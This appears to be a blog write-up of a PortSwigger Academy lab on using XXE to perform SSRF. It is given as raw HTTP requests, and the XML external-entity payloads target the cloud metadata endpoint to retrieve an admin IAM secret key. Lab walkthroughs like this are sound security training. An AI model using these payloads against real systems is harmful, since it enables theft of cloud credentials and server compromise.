Skip to content

chojnowski.it

Port Swigger Exploiting XXE to perform SSRF attack

Port Swigger Exploiting XXE to perform SSRF attack

Exploiting XXE to perform SSRF attacks¶

Solution¶

Open website: https://0a5000ab042f28de805d442900ae0093.web-security-academy.net/product?productId=1¶

Check stock on the website: https://0a5000ab042f28de805d442900ae0093.web-security-academy.net/product?productId=1
---
POST /product/stock HTTP/2
Host: 0a5000ab042f28de805d442900ae0093.web-security-academy.net
Cookie: session=fRAAfhxHLYNGQZDxLmysKmyLawOOQ53n
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: */*
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://0a5000ab042f28de805d442900ae0093.web-security-academy.net/product?productId=1
Content-Type: application/xml
Content-Length: 107
Origin: https://0a5000ab042f28de805d442900ae0093.web-security-academy.net
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0
Te: trailers

<?xml version="1.0" encoding="UTF-8"?><stockCheck><productId>1</productId><storeId>2</storeId></stockCheck>

Check - SSRF basic payload¶

Payload
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "http://169.254.169.254/"> ]>
<stockCheck><productId>&xxe;</productId><storeId>
2</storeId></stockCheck>
---
POST /product/stock HTTP/2
Host: 0a5000ab042f28de805d442900ae0093.web-security-academy.net
Cookie: session=fRAAfhxHLYNGQZDxLmysKmyLawOOQ53n
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: */*
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://0a5000ab042f28de805d442900ae0093.web-security-academy.net/product?productId=1
Content-Type: application/xml
Content-Length: 186
Origin: https://0a5000ab042f28de805d442900ae0093.web-security-academy.net
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0
Te: trailers

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "http://169.254.169.254/"> ]>
<stockCheck><productId>&xxe;</productId><storeId>
2</storeId></stockCheck>

Get server's IAM secret access key¶

POST /product/stock HTTP/2
Host: 0a5000ab042f28de805d442900ae0093.web-security-academy.net
Cookie: session=fRAAfhxHLYNGQZDxLmysKmyLawOOQ53n
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: */*
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://0a5000ab042f28de805d442900ae0093.web-security-academy.net/product?productId=1
Content-Type: application/xml
Content-Length: 233
Origin: https://0a5000ab042f28de805d442900ae0093.web-security-academy.net
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0
Te: trailers

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/admin"> ]>
<stockCheck><productId>&xxe;</productId><storeId>
2</storeId></stockCheck>

Solved¶